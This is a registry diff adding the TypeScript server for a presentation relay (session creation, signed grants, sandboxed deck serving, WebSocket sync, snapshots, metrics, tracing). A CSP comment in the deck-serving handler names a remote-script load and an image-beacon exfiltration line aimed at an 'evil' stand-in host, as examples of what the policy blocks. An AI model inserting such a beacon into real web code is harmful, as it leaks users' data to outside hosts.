@liebstoeckel/present-relay 0.3.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,546 @@
1
+ import {
2
+ Hub,
3
+ createSession,
4
+ roleForToken,
5
+ injectBootstrap,
6
+ injectWatermark,
7
+ audienceScopeFromHtml,
8
+ type Peer,
9
+ type PeerRole,
10
+ type Role,
11
+ type Session,
12
+ } from "@liebstoeckel/live-server";
13
+ import { bearer, matchAccount, safeEqual } from "./auth";
14
+ import { mintGrant, verifyGrant } from "./grant";
15
+ import { createRelayMetrics } from "./metrics";
16
+ import { withSpan, SpanKind, ctxFromHeaders } from "./tracing";
17
+
18
/**
 * Collapse concrete session ids in a request path into a `:id` placeholder so span
 * names stay low-cardinality (`/sync/<id>` → `/sync/:id`).
 *
 * @param pathname URL pathname of the incoming request.
 * @returns The pathname with a leading `/api/sessions/<id>`, `/s/<id>` or `/sync/<id>`
 *   segment templated; any other path is returned unchanged.
 */
function tracePath(pathname: string): string {
  const sessionApi = /^\/api\/sessions\/[^/]+/;
  const deckOrSync = /^\/(s|sync)\/[^/]+/;
  const templated = pathname.replace(sessionApi, "/api/sessions/:id");
  // `$1` keeps whichever prefix matched (`s` or `sync`).
  return templated.replace(deckOrSync, "/$1/:id");
}
25
+
26
/**
 * Minimal object-storage contract used for session snapshots (ADR 0061).
 * The relay core only depends on this interface, so a deployment can plug in any
 * backend (e.g. an S3 client) and tests can use an in-memory one.
 */
export interface RelayStorage {
  /** Read the bytes stored under `key`; resolves to `null` when nothing is stored. */
  get(key: string): Promise<Uint8Array | null>;
  /** Store `bytes` under `key`. */
  put(key: string, bytes: Uint8Array): Promise<void>;
}
32
+
33
/** Configuration accepted by `createRelay`. Only `accountTokens` is required. */
export interface RelayOptions {
  /** Pre-shared account API tokens; a POST must present one of them as `Bearer`. */
  accountTokens: readonly string[];
  /** TCP port to listen on. */
  port?: number;
  /** Interface/hostname to bind. */
  hostname?: string;
  /**
   * Public base URL used for the links handed back (e.g. https://relay.example).
   * When omitted it is derived from the request (honors x-forwarded-proto/host).
   */
  publicBaseUrl?: string;
  /** Maximum uploaded deck size, in bytes. */
  maxDeckBytes?: number;
  /** Maximum number of concurrent sessions per account. */
  maxSessionsPerAccount?: number;
  /** Session lifetime (ms); the doc and its tokens are dropped afterwards. */
  sessionTtlMs?: number;
  /** Cap on inbound WebSocket frame size, in bytes. */
  maxFrameBytes?: number;
  /** Keepalive period (ms) for each session Hub. */
  keepaliveMs?: number;
  /**
   * Object storage for session snapshots (ADR 0061). Sessions created with an
   * `x-snapshot-key` header are seeded from it on create and snapshotted to it on a
   * timer and on end. Absent → no persistence (the trusted/transient relay).
   */
  storage?: RelayStorage;
  /** Snapshot period (ms) for persisted sessions. */
  snapshotMs?: number;
  /** Per-audience-peer write rate (enforced sessions). */
  audienceRate?: { capacity: number; refillPerSec: number };
  /** Image tag for the `liebstoeckel_relay_build_info` metric (ADR 0073). */
  version?: string;
}
62
+
63
/** In-memory state the relay keeps for one live session. */
interface RelaySession {
  /** Session id (also the key in the relay's session map). */
  id: string;
  /** Account that created the session. */
  account: string;
  /** Sync hub the session's peers join. */
  hub: Hub;
  /** The built deck HTML (no bootstrap yet; that is injected per request). */
  html: string;
  /** Underlying live-server session (holds the raw presenter/viewer tokens). */
  session: Session;
  /** Privileged peer token: the local deck-runner that applies server-plugin effects. */
  runnerToken: string;
  /** Creation time, epoch milliseconds. */
  createdAt: number;
  /**
   * Effective lifetime (ms): the plan duration for hosted sessions (ADR 0061),
   * otherwise the relay default.
   */
  ttlMs: number;
  /** Hosted live (ADR 0061): write-scope enforce audience peers. */
  enforce: boolean;
  /** Max concurrent audience peers (plan's liveAudienceCap); undefined = uncapped. */
  audienceCap?: number;
  /** Currently connected audience peers (checked against the cap). */
  audienceCount: number;
  /** Show the "Published with liebstoeckel" provenance badge (free tier; ADR 0061). */
  watermark: boolean;
  /** Object-storage key for this session's Yjs snapshot, if persisted. */
  snapshotKey?: string;
  /** Expiry timer handle. */
  ttl?: ReturnType<typeof setTimeout>;
  /** Periodic snapshot timer handle. */
  snap?: ReturnType<typeof setInterval>;
}
89
+
90
/** Handle returned by `createRelay` for a running relay. */
export interface RelayServer {
  /** Port the server is listening on. */
  port: number;
  /** Base URL of the relay (the configured public URL, else derived from host + port). */
  baseUrl: string;
  /** Live sessions, keyed by session id. */
  sessions: Map<string, RelaySession>;
  /**
   * Operational counters (ADR 0061 / ticket 0015): snapshot write failures, so a
   * silently-lost result surfaces in logs/metrics instead of vanishing.
   */
  stats(): { snapshotFailures: number };
  /**
   * Flush every active session's final snapshot, then tear down. Awaitable so a
   * SIGTERM handler can guarantee the writes land before the process exits
   * (ADR 0071 §5 / ticket 0018; the racy fire-and-forget path lost results).
   */
  stop(): Promise<void>;
}
102
+
103
/** Per-socket data attached at WebSocket upgrade time. */
type WSData = {
  /** Id of the session the socket belongs to. */
  sessionId: string;
  /** Hub peer for this socket; `null` until the socket has joined the hub. */
  peer: Peer | null;
  /** Role the socket joins the hub with. */
  role: PeerRole;
};
104
+
105
/**
 * Generate a random token as lowercase hex.
 *
 * @param bytes Number of random bytes to draw (default 16 → 32 hex characters).
 * @returns A string of `2 * bytes` hex digits.
 */
const hex = (bytes = 16): string => {
  const buf = crypto.getRandomValues(new Uint8Array(bytes));
  let out = "";
  for (const byte of buf) {
    // Zero-pad so every byte contributes exactly two characters.
    out += byte.toString(16).padStart(2, "0");
  }
  return out;
};
110
+
111
/** Fallback values for every tunable that `RelayOptions` leaves unset. */
const DEFAULTS = {
  // 8 MiB
  maxDeckBytes: 8 * 2 ** 20,
  // Per-pod safety valve, NOT the platform ceiling (ADR 0071 §2 / ticket 0017): real
  // concurrency is gated by per-org entitlements + per-pod capacity in the control
  // plane's choosePod, and sessions spread across the StatefulSet's pods. This just
  // backstops a single pod's RAM.
  maxSessionsPerAccount: 200,
  // 6 hours
  sessionTtlMs: 21_600_000,
  // 4 MiB
  maxFrameBytes: 4 * 2 ** 20,
  keepaliveMs: 25_000,
  snapshotMs: 20_000,
  audienceRate: { capacity: 20, refillPerSec: 5 },
};
124
+
125
/**
 * Resolve the public http/ws origins for the links we return.
 *
 * With `opts.publicBaseUrl` set, that URL (minus one trailing slash) is used and the
 * ws origin is derived by swapping the leading `http` for `ws`. Otherwise the origin
 * comes from the request, preferring `x-forwarded-proto` / `x-forwarded-host`.
 *
 * Forwarded headers may carry a comma-separated list when several proxies are chained;
 * only the first entry is used. It is trimmed (and the proto lowercased), and an empty
 * value falls back to the request URL.
 *
 * @param req Incoming request.
 * @param opts Relay options (only `publicBaseUrl` is read).
 * @returns `http` and `ws` origins without a trailing slash.
 */
function originOf(req: Request, opts: RelayOptions): { http: string; ws: string } {
  if (opts.publicBaseUrl) {
    const b = opts.publicBaseUrl.replace(/\/$/, "");
    return { http: b, ws: b.replace(/^http/i, "ws") };
  }
  const url = new URL(req.url);
  // First entry of a (possibly comma-separated) header, or undefined when absent/empty.
  const firstValue = (name: string): string | undefined => {
    const first = req.headers.get(name)?.split(",")[0]?.trim();
    return first || undefined;
  };
  const proto =
    firstValue("x-forwarded-proto")?.toLowerCase() ?? (url.protocol === "https:" ? "https" : "http");
  const host = firstValue("x-forwarded-host") ?? url.host;
  return { http: `${proto}://${host}`, ws: `${proto === "https" ? "wss" : "ws"}://${host}` };
}
136
+
137
/**
 * Build a JSON response.
 *
 * @param body Value serialized with `JSON.stringify`.
 * @param status HTTP status code (default 200).
 */
const json = (body: unknown, status = 200): Response => {
  const payload = JSON.stringify(body);
  const headers = { "content-type": "application/json" };
  return new Response(payload, { status, headers });
};
139
+
140
/**
 * Map a raw token to a role within a session.
 *
 * @param s Session the token is presented for.
 * @param token Raw token, or null when none was supplied.
 * @returns `"runner"` when the token equals the session's runner token (compared with
 *   `safeEqual`), otherwise whatever `roleForToken` resolves for the session;
 *   `null` for a missing/empty token. null = deny.
 */
function relayRole(s: RelaySession, token: string | null): Role | "runner" | null {
  if (token === null || token === "") return null;
  return safeEqual(s.runnerToken, token) ? "runner" : roleForToken(s.session, token);
}
147
+
148
/**
 * Resolve a connection's role from its `?t=…` value, preferring a **signed grant**
 * (ADR 0061): the grant is verified against the session's account with `verifyGrant`
 * and must name this session and a presenter/viewer role. Anything else falls back to
 * the raw session tokens and the runner token via `relayRole`.
 *
 * @param s Session being accessed.
 * @param token Value of the `t` query parameter, or null.
 * @param now Current time (epoch ms), passed to grant verification.
 * @returns The resolved role, or null to deny.
 */
function resolveRole(s: RelaySession, token: string | null, now: number): Role | "runner" | null {
  if (!token) return null;
  const grant = verifyGrant(token, s.account, now);
  if (grant && grant.session === s.id) {
    // Grants only ever confer the public roles; a runner must use its raw token.
    if (grant.role === "presenter" || grant.role === "viewer") return grant.role;
  }
  return relayRole(s, token);
}
158
+
159
+ /** A public relay: account-token-gated deck upload, opaque-origin deck serving,
160
+ * and a token-gated Yjs WebSocket per session. Decks run their code locally (the
161
+ * runner connects as a privileged peer); the relay only relays + serves bytes. */
162
+ export function createRelay(opts: RelayOptions): RelayServer {
163
+ const cfg = { ...DEFAULTS, ...opts };
164
+ if (!opts.accountTokens.length) throw new Error("createRelay: at least one account token is required");
165
+ const sessions = new Map<string, RelaySession>();
166
+ let snapshotFailures = 0;
167
+ // Process start time, reported in /stats so the reconciler can tell when a pod has
168
+ // RESTARTED (same name, fresh memory) and re-provision sessions it lost, not just when
169
+ // a pod is gone (ADR 0071 §5 / ticket 0018+0019).
170
+ const startedAt = Date.now();
171
+ // Drain flag (ADR 0071 §4 / ticket 0019): the reconciler cordons a pod (POST /cordon)
172
+ // to stop NEW placement while existing sessions finish. Reported in /stats so the
173
+ // control plane's choosePod skips it; in-memory, so a recreated pod starts uncordoned.
174
+ let cordoned = false;
175
+
176
// Metrics (ADR 0073 / ticket 0023). One registry per relay instance. The gauges below
// are computed at scrape time from the live `sessions` map; the registry is rendered
// by the bearer-gated GET /metrics route.
const metrics = createRelayMetrics(opts.version ?? process.env.PRESENT_RELAY_VERSION ?? "unknown");
metrics.registry.onCollect(() => {
  const live = [...sessions.values()];
  const audience = live.reduce((total, s) => total + s.audienceCount, 0);
  const deckBytes = live.reduce((total, s) => total + Buffer.byteLength(s.html, "utf8"), 0);
  metrics.sessions.set(sessions.size);
  metrics.audiencePeers.set(audience);
  metrics.deckBytes.set(deckBytes);
  metrics.cordoned.set(cordoned ? 1 : 0);
  // Reported in whole seconds.
  metrics.startedAt.set(Math.floor(startedAt / 1000));
});
192
+
193
/**
 * Write a session's current hub snapshot to object storage.
 * No-op when no storage is configured or the session has no snapshot key.
 * Never rejects: a failed write is counted and logged instead of thrown.
 */
const persist = async (s: RelaySession) => {
  const storage = cfg.storage;
  const key = s.snapshotKey;
  if (!storage || !key) return;
  metrics.snapshotWrites.inc();
  try {
    await storage.put(key, s.hub.snapshot());
  } catch (e) {
    // Best-effort: a failed write must never crash the relay, but it must NOT be
    // silent (results would vanish). Structured log + a counter (ADR 0061).
    snapshotFailures++;
    metrics.snapshotFailures.inc();
    const entry = { level: "error", msg: "relay snapshot persist failed", key: s.snapshotKey, err: String(e) };
    console.error(JSON.stringify(entry));
  }
};
208
+
209
/**
 * End a session: cancel its timers, unregister it, write a final snapshot and then
 * destroy its hub. The snapshot is fire-and-forget (`persist` never rejects).
 *
 * The map entry is only removed when it is still THIS session object. Session ids can
 * be reused (a caller-provided `x-session-id`), so deleting by id alone could
 * unregister a newer session that replaced this one while leaving that session's
 * hub and timers running.
 */
const dropSession = (s: RelaySession) => {
  if (s.ttl) clearTimeout(s.ttl);
  if (s.snap) clearInterval(s.snap);
  if (sessions.get(s.id) === s) sessions.delete(s.id);
  // Snapshot the final state before tearing down the doc (results survive, ADR 0061).
  void persist(s).finally(() => s.hub.destroy());
};
216
+
217
/**
 * POST /api/sessions: create a live session from an uploaded deck (ADR 0061).
 * A closure over cfg/sessions/metrics/persist/dropSession.
 *
 * Request: `Bearer` account token, deck HTML as the body, and optional control-plane
 * headers `x-live-enforce`, `x-snapshot-key`, `x-session-ttl-ms`, `x-audience-cap`,
 * `x-watermark`, `x-session-id`.
 *
 * @returns The session-info JSON, or a reject response with the matching
 *   `sessionRejects` reason incremented: 401 unauthorized, 503 cordoned,
 *   413 too_large, 400 empty, 409 conflict (the provided session id belongs to
 *   another account), 429 quota.
 */
const handleCreateSession = async (req: Request): Promise<Response> => {
  // Shared reject path: bump the per-reason counter and answer with a JSON error.
  const reject = (reason: string, error: string, status: number): Response => {
    metrics.sessionRejects.inc({ reason });
    return json({ error }, status);
  };

  const account = matchAccount(cfg.accountTokens, bearer(req));
  if (!account) return reject("unauthorized", "unauthorized", 401);
  // Cordoned pods take no new sessions; a backstop, placement already skips us.
  if (cordoned) return reject("cordoned", "relay draining", 503);

  // Cheap pre-check on the declared length, then the authoritative check on the body.
  const declared = Number(req.headers.get("content-length") ?? "0");
  if (declared > cfg.maxDeckBytes) return reject("too_large", "deck too large", 413);
  const html = await req.text();
  if (Buffer.byteLength(html, "utf8") > cfg.maxDeckBytes) return reject("too_large", "deck too large", 413);
  if (!html.trim()) return reject("empty", "empty deck", 400);

  // Stable session id across re-provision (ADR 0072): the control plane re-creates
  // a recovered session under the SAME id on a new pod, so the audience URL
  // (`/s/<id>?t=<grant>`) and its stateless grant stay valid. Absent (CLI) → relay mints one.
  const providedId = (req.headers.get("x-session-id") || "").trim() || undefined;
  const stale = providedId ? sessions.get(providedId) : undefined;
  // Only the owning account may replace a session, mirroring the DELETE route's
  // ownership check; otherwise any account could evict another account's session.
  if (stale && stale.account !== account) return reject("conflict", "session id in use", 409);

  // Quota: the entry being replaced does not count against its own replacement.
  let count = 0;
  for (const s of sessions.values()) {
    if (s.account === account && s !== stale) count++;
  }
  if (count >= cfg.maxSessionsPerAccount) return reject("quota", "session quota reached", 429);

  // Hosted live (ADR 0061): the control plane opts a session into audience
  // write-scope enforcement (scope read from the deck's own embedded manifest)
  // and names the object-storage key its Yjs snapshot persists to.
  const enforce = req.headers.get("x-live-enforce") === "1";
  const snapshotKey = req.headers.get("x-snapshot-key") || undefined;
  // Plan limits the control plane passes per session (ADR 0061): the duration
  // (so a free session's link dies on time, not at the relay's default) and
  // the audience cap. TTL is clamped to the relay max; absent → relay default.
  const reqTtl = Number(req.headers.get("x-session-ttl-ms") ?? "");
  const ttlMs = Number.isFinite(reqTtl) && reqTtl > 0 ? Math.min(reqTtl, cfg.sessionTtlMs) : cfg.sessionTtlMs;
  const capHdr = Number(req.headers.get("x-audience-cap") ?? "");
  const audienceCap = Number.isFinite(capHdr) && capHdr > 0 ? capHdr : undefined;
  const watermark = req.headers.get("x-watermark") === "1";

  const session = createSession();
  if (providedId) session.id = providedId;
  if (stale) {
    // A stale entry under this id (re-provision raced its predecessor's teardown):
    // AWAIT its snapshot before seeding below, so the fresh session is seeded from
    // the predecessor's latest state rather than racing the un-awaited write that
    // dropSession issues.
    await persist(stale);
    if (sessions.get(stale.id) === stale) dropSession(stale);
  }

  const hub = new Hub({
    keepaliveMs: cfg.keepaliveMs,
    audience: enforce ? { scope: audienceScopeFromHtml(html), rate: cfg.audienceRate } : undefined,
  });
  // Re-seed from a prior snapshot if one exists (relay restart / reconnect).
  if (cfg.storage && snapshotKey) {
    try {
      const prior = await cfg.storage.get(snapshotKey);
      if (prior) {
        hub.seed(prior);
        metrics.snapshotSeed.inc({ result: "hit" });
      } else {
        metrics.snapshotSeed.inc({ result: "miss" });
      }
    } catch {
      /* no prior snapshot / unreadable → start fresh */
      metrics.snapshotSeed.inc({ result: "error" });
    }
  }

  // Another request may have registered this id while we awaited above. Never
  // overwrite the map entry blindly: that would leak the other session's hub/timers.
  const raced = sessions.get(session.id);
  if (raced) {
    if (raced.account !== account) {
      hub.destroy();
      return reject("conflict", "session id in use", 409);
    }
    dropSession(raced);
  }

  const rs: RelaySession = {
    id: session.id,
    account,
    hub,
    html,
    session,
    runnerToken: hex(),
    createdAt: Date.now(),
    ttlMs,
    enforce,
    audienceCap,
    audienceCount: 0,
    watermark,
    snapshotKey,
  };
  // Timers are unref'd (where supported) so they never keep the process alive.
  rs.ttl = setTimeout(() => dropSession(rs), ttlMs);
  (rs.ttl as { unref?: () => void }).unref?.();
  if (cfg.storage && snapshotKey) {
    rs.snap = setInterval(() => void persist(rs), cfg.snapshotMs);
    (rs.snap as { unref?: () => void }).unref?.();
  }
  sessions.set(rs.id, rs);
  metrics.sessionCreates.inc();

  // Mint signed, expiring presenter/viewer grants (ADR 0061). The links carry
  // these, and the relay verifies them statelessly with the account token; no
  // per-session token is stored client-side. (Raw tokens are still returned for
  // CLI/runner back-compat.)
  const exp = rs.createdAt + ttlMs;
  const presenterGrant = mintGrant({ session: rs.id, role: "presenter", exp }, account);
  const viewerGrant = mintGrant({ session: rs.id, role: "viewer", exp }, account);

  const { http, ws } = originOf(req, opts);
  return json({
    id: rs.id,
    presenterToken: session.presenterToken,
    viewerToken: session.viewerToken,
    runnerToken: rs.runnerToken,
    presenterGrant,
    viewerGrant,
    expiresAt: exp,
    urls: {
      // Grants are encoded so any reserved character survives the query string.
      presenter: `${http}/s/${rs.id}?t=${encodeURIComponent(presenterGrant)}`,
      viewer: `${http}/s/${rs.id}?t=${encodeURIComponent(viewerGrant)}`,
      sync: `${ws}/sync/${rs.id}`,
    },
  });
};
347
+
348
/**
 * GET /s/:id: serve the deck to a grant-bearing presenter/viewer in an opaque sandbox
 * (ADR 0014/0069). A closure over sessions.
 *
 * @param req Incoming request (used to derive the public origins).
 * @param url Parsed request URL; the credential is read from its `t` parameter.
 * @param id Session id taken from the path.
 * @returns The sandboxed deck HTML, or a 403 on an unknown session or a
 *   missing/invalid/expired credential (runner tokens are WS-only and may not load the page).
 */
const serveDeck = (req: Request, url: URL, id: string): Response => {
  const s = sessions.get(id);
  const token = url.searchParams.get("t");
  const role = s ? resolveRole(s, token, Date.now()) : null;
  if (!s || !role || role === "runner" || !token) {
    metrics.grantDenials.inc();
    return new Response("Invalid or expired link.", { status: 403 });
  }
  const { http, ws } = originOf(req, opts);
  // `token` is the DECODED query value, so it must be re-encoded before it is embedded
  // in another URL; otherwise reserved characters (`+`, `&`, `#`, `%`, …) corrupt it.
  const wsUrl = `${ws}/sync/${s.id}?t=${encodeURIComponent(token)}`;
  const viewer = `${http}/s/${s.id}?t=${encodeURIComponent(s.session.viewerToken)}`;
  // Free-tier provenance badge on the public audience view (ADR 0061); paid
  // (white-label) sessions omit it. Presenter view is never watermarked.
  const html = s.watermark && role === "viewer" ? injectWatermark(s.html) : s.html;
  const body = injectBootstrap(html, { ws: wsUrl, session: s.id, role, token, participant: "", viewer });
  return new Response(body, {
    headers: {
      "content-type": "text/html; charset=utf-8",
      // Opaque-origin isolation: no allow-same-origin → the deck can't reach
      // the relay's cookies/API/DOM, and each load is a fresh opaque origin
      // (deck-to-deck isolation). connect-src pins the live socket to us.
      // `allow-popups` enables the presenter pop-out (P → window.open of
      // /s/:id?t=<presenterToken>#presenter); the popup is itself served
      // sandboxed by the relay and syncs through the Hub, so isolation holds
      // (ADR 0014). Without it window.open throws in the sandbox.
      // `allow-fullscreen` is NOT a valid CSP `sandbox` token (it's an
      // iframe/Permissions-Policy feature); browsers reject it and log a
      // console error. Fullscreen for this top-level doc is governed by the
      // Fullscreen API / Permissions-Policy, not the sandbox directive.
      //
      // `default-src 'none'` + a single-file allowlist (ADR 0069): a deck
      // inlines all assets (ADR 0001), so it needs zero external origins.
      // This blocks remote code (`<script src=evil>`) and GET-beacon exfil
      // (`new Image().src='https://evil/?x'`) that `connect-src` can't pin.
      // Mirrors the dashboard's static-share CSP, but keeps `connect-src`
      // to our sync socket and `allow-popups` for the presenter pop-out.
      "content-security-policy": `default-src 'none'; script-src 'unsafe-inline'; style-src 'unsafe-inline'; img-src data: blob:; font-src data:; media-src data: blob:; connect-src ${ws} ${http}; frame-ancestors 'none'; sandbox allow-scripts allow-popups`,
      "x-content-type-options": "nosniff",
      "referrer-policy": "no-referrer",
    },
  });
};
392
+
393
/**
 * HTTP dispatcher: a closure (keeps access to sessions/cfg/cordoned) that the Bun.serve
 * `fetch` handler calls, wrapped in a SERVER span for traced paths.
 *
 * Routes: /healthz, /stats, /metrics, POST /cordon, POST /api/sessions,
 * DELETE /api/sessions/:id, /sync/:id (WebSocket upgrade), /s/:id; anything else → 404.
 *
 * @returns A Response, or undefined for a successful WebSocket upgrade (Bun's
 *   hold-the-socket signal).
 */
const handleFetch = async (req: Request, srv: Bun.Server<WSData>): Promise<Response | undefined> => {
  const url = new URL(req.url);
  const { pathname } = url;

  if (pathname === "/healthz") return new Response("ok");

  // --- fleet stats: this pod's live load, for control-plane placement (ADR 0071 §2). ---
  // Account-gated: the per-pod Ingress makes it publicly reachable.
  if (pathname === "/stats") {
    if (!matchAccount(cfg.accountTokens, bearer(req))) return json({ error: "unauthorized" }, 401);
    return json({ ok: true, sessions: sessions.size, cordoned, startedAt });
  }

  // --- Prometheus metrics: this pod's logical state (ADR 0073). Account-gated like /stats, so
  // the bearer keeps it off the public surface; Alloy scrapes it on the pod network. ---
  if (pathname === "/metrics") {
    if (!matchAccount(cfg.accountTokens, bearer(req))) return new Response("unauthorized", { status: 401 });
    return new Response(metrics.registry.render(), {
      headers: { "content-type": "text/plain; version=0.0.4; charset=utf-8" },
    });
  }

  // --- drain control: cordon/uncordon this pod (reconciler only, ADR 0071 §4). Cordoned →
  // refuse NEW sessions; existing run to completion. `{ "cordoned": false }` lifts it. ---
  if (pathname === "/cordon" && req.method === "POST") {
    if (!matchAccount(cfg.accountTokens, bearer(req))) return json({ error: "unauthorized" }, 401);
    // Any body other than an object with `cordoned: false` cordons the pod. That includes
    // an absent/invalid body and a JSON `null`, which must not throw on property access.
    const body: unknown = await req.json().catch(() => null);
    const lift = typeof body === "object" && body !== null && (body as { cordoned?: unknown }).cordoned === false;
    cordoned = !lift;
    return json({ ok: true, cordoned });
  }

  // --- control API: create / end a session (ADR 0061). ---
  if (pathname === "/api/sessions" && req.method === "POST") return handleCreateSession(req);
  const del = pathname.match(/^\/api\/sessions\/([^/]+)$/);
  if (del && req.method === "DELETE") {
    const account = matchAccount(cfg.accountTokens, bearer(req));
    if (!account) return json({ error: "unauthorized" }, 401);
    const s = sessions.get(del[1]!);
    // A session owned by another account is reported as missing, not forbidden.
    if (!s || s.account !== account) return json({ error: "not found" }, 404);
    dropSession(s);
    return new Response(null, { status: 204 });
  }

  // --- WebSocket sync: audience/presenter connect (ADR 0061). ---
  const sync = pathname.match(/^\/sync\/([^/]+)$/);
  if (sync) {
    const s = sessions.get(sync[1]!);
    const relRole = s ? resolveRole(s, url.searchParams.get("t"), Date.now()) : null;
    if (!s || !relRole) {
      metrics.grantDenials.inc();
      return new Response("forbidden", { status: 403 });
    }
    // viewer → audience (write-scope enforced when the session opted in);
    // presenter + runner are trusted writers.
    const role: PeerRole = relRole === "viewer" ? "audience" : "presenter";
    // Enforce the plan's audience cap (ADR 0061); presenter/runner never count.
    if (role === "audience" && s.audienceCap !== undefined && s.audienceCount >= s.audienceCap) {
      metrics.audienceCapRejects.inc();
      return new Response("audience full", { status: 503 });
    }
    const data: WSData = { sessionId: s.id, peer: null, role };
    return srv.upgrade(req, { data }) ? undefined : new Response("upgrade failed", { status: 400 });
  }

  // --- serve the deck in an opaque sandbox (ADR 0014/0069). ---
  const serve = pathname.match(/^\/s\/([^/]+)$/);
  if (serve) return serveDeck(req, url, serve[1]!);

  return new Response("not found", { status: 404 });
};
467
+
468
// The HTTP + WebSocket server. `fetch` dispatches through handleFetch; the websocket
// handlers bridge each socket to its session's Hub and keep the connection metrics and
// the per-session audience count in step.
const server = Bun.serve<WSData>({
  port: opts.port ?? 0,
  hostname: opts.hostname ?? "0.0.0.0",
  // OSS-safe ingress tracing: gated by OTEL_EXPORTER_OTLP_ENDPOINT (a no-op with NO egress when
  // unset; a standalone/offline relay emits nothing). A SERVER span continuing the inbound W3C
  // traceparent so the relay JOINS the trace: control → relay (session create) and the audience
  // traefik → relay path. Infra/control paths (probes, scrapes, cordon) are not traced.
  fetch(req, srv) {
    const { pathname } = new URL(req.url);
    if (pathname === "/healthz" || pathname === "/stats" || pathname === "/metrics" || pathname === "/cordon") {
      return handleFetch(req, srv);
    }
    return withSpan(
      `relay ${req.method} ${tracePath(pathname)}`,
      ctxFromHeaders(req.headers),
      { "http.request.method": req.method, "url.path": pathname },
      () => handleFetch(req, srv),
      SpanKind.SERVER,
    );
  },
  websocket: {
    idleTimeout: 120,
    maxPayloadLength: cfg.maxFrameBytes,
    open(socket) {
      const s = sessions.get(socket.data.sessionId);
      if (!s) {
        // The session ended between upgrade and open. Nothing was counted and no peer
        // was joined, so `close` must treat this socket as never opened.
        socket.close();
        return;
      }
      if (socket.data.role === "audience") s.audienceCount++;
      metrics.wsOpens.inc({ role: socket.data.role });
      metrics.wsConnections.inc({ role: socket.data.role });
      socket.data.peer = s.hub.join((d) => {
        metrics.wsFrames.inc({ dir: "out" });
        metrics.wsBytes.inc({ dir: "out" }, d.byteLength);
        socket.send(d);
      }, socket.data.role);
    },
    message(socket, msg) {
      // Only binary frames are relayed; text frames are ignored.
      if (typeof msg === "string") return;
      const bytes = new Uint8Array(msg as unknown as ArrayBufferLike);
      if (bytes.byteLength > cfg.maxFrameBytes) return;
      metrics.wsFrames.inc({ dir: "in" });
      metrics.wsBytes.inc({ dir: "in" }, bytes.byteLength);
      socket.data.peer?.recv(bytes);
    },
    close(socket) {
      const { peer, role, sessionId } = socket.data;
      // `peer` is set only after `open` counted this socket. Without it there is nothing
      // to undo; decrementing anyway would drive the connections gauge (and possibly
      // the audience count) below the true value.
      if (!peer) return;
      peer.leave();
      metrics.wsCloses.inc({ role });
      metrics.wsConnections.dec({ role });
      const s = sessions.get(sessionId);
      if (s && role === "audience" && s.audienceCount > 0) s.audienceCount--;
    },
  },
});
523
+
524
const port = server.port ?? 0;
// The public handle: listening port, base URL, the live session map, counters, and a
// lossless `stop()`.
return {
  port,
  baseUrl: opts.publicBaseUrl?.replace(/\/$/, "") ?? `http://${opts.hostname ?? "0.0.0.0"}:${port}`,
  sessions,
  stats: () => ({ snapshotFailures }),
  /**
   * Graceful shutdown: refuse new sessions, flush every active session's final
   * snapshot and AWAIT the writes, tear the sessions down, then stop the server.
   */
  async stop() {
    // Cordon first so no session can be created while the flush below is in flight;
    // such a session would not be in `active` and would be lost without a snapshot.
    cordoned = true;
    const active = [...sessions.values()];
    // The old path fired `dropSession` (un-awaited persist) then returned, so a
    // SIGTERM + process.exit raced the storage writes and lost the last interval's
    // state. Awaiting here makes a graceful shutdown lossless (ADR 0071 §5).
    await Promise.allSettled(active.map((s) => persist(s)));
    for (const s of active) {
      if (s.ttl) clearTimeout(s.ttl);
      if (s.snap) clearInterval(s.snap);
      sessions.delete(s.id);
      s.hub.destroy();
    }
    // Awaited so the returned promise settles only once the server has shut down
    // (awaiting a non-promise return value is a harmless no-op).
    await server.stop(true);
  },
};
546
+ }
package/src/tracing.ts ADDED
@@ -0,0 +1,86 @@
1
+ import { trace, context, propagation, SpanStatusCode, SpanKind, type Span, type Context } from "@opentelemetry/api";
2
+ import { BasicTracerProvider, BatchSpanProcessor } from "@opentelemetry/sdk-trace-base";
3
+
4
+ // Re-export so call sites set span kind via the tracing module (centralized OTel access).
5
+ export { SpanKind };
6
+ import { OTLPTraceExporter } from "@opentelemetry/exporter-trace-otlp-http";
7
+ import { resourceFromAttributes } from "@opentelemetry/resources";
8
+ import { ATTR_SERVICE_NAME, ATTR_SERVICE_VERSION } from "@opentelemetry/semantic-conventions";
9
+ import { AsyncLocalStorageContextManager } from "@opentelemetry/context-async-hooks";
10
+ import { W3CTraceContextPropagator } from "@opentelemetry/core";
11
+
12
+ // OTLP tracing for the relay (ADR 0073 step 3b / ticket 0024). MANUAL spans + W3C
13
+ // `traceparent` propagation, not auto-instrumentation (require-in-the-middle is unreliable
14
+ // under Bun; the propagator + AsyncLocalStorage context API work, verified). **Gated**: a no-op
15
+ // unless OTEL_EXPORTER_OTLP_ENDPOINT is set, so the services run identically with tracing off; every helper below degrades to a safe no-op (the API's default no-op tracer/propagator).
16
+ //
17
+ // Duplicated in packages/present-relay/src/tracing.ts (present-relay is OSS-published; a shared
18
+ // package would force the five-place OSS lock-step).
19
+
20
+ let started = false;
21
+
22
/**
 * Install the global tracer provider, context manager and W3C propagator.
 * Call once at process start; repeat calls are ignored, and nothing is installed
 * when OTEL_EXPORTER_OTLP_ENDPOINT is unset.
 *
 * @param serviceName Value reported as the `service.name` resource attribute.
 */
export function initTracing(serviceName: string): void {
  if (started) return;
  const endpoint = process.env.OTEL_EXPORTER_OTLP_ENDPOINT;
  if (!endpoint) return;
  started = true;

  const resource = resourceFromAttributes({
    [ATTR_SERVICE_NAME]: serviceName,
    [ATTR_SERVICE_VERSION]: process.env.PRESENT_RELAY_VERSION ?? "unknown",
  });
  // Traces go to `<endpoint>/v1/traces` (one trailing slash on the endpoint is dropped).
  const exporter = new OTLPTraceExporter({ url: `${endpoint.replace(/\/$/, "")}/v1/traces` });
  const provider = new BasicTracerProvider({
    resource,
    spanProcessors: [new BatchSpanProcessor(exporter)],
  });

  trace.setGlobalTracerProvider(provider);
  context.setGlobalContextManager(new AsyncLocalStorageContextManager().enable());
  propagation.setGlobalPropagator(new W3CTraceContextPropagator());
}
39
+
40
/** Look up the tracer on each call, so it reflects whichever provider is currently registered. */
const tracer = () => {
  return trace.getTracer("liebstoeckel");
};
41
+
42
/**
 * Extract the parent trace context (W3C traceparent) from incoming request headers.
 *
 * @param headers Headers of the inbound request.
 * @returns The active context extended with whatever the global propagator extracts.
 */
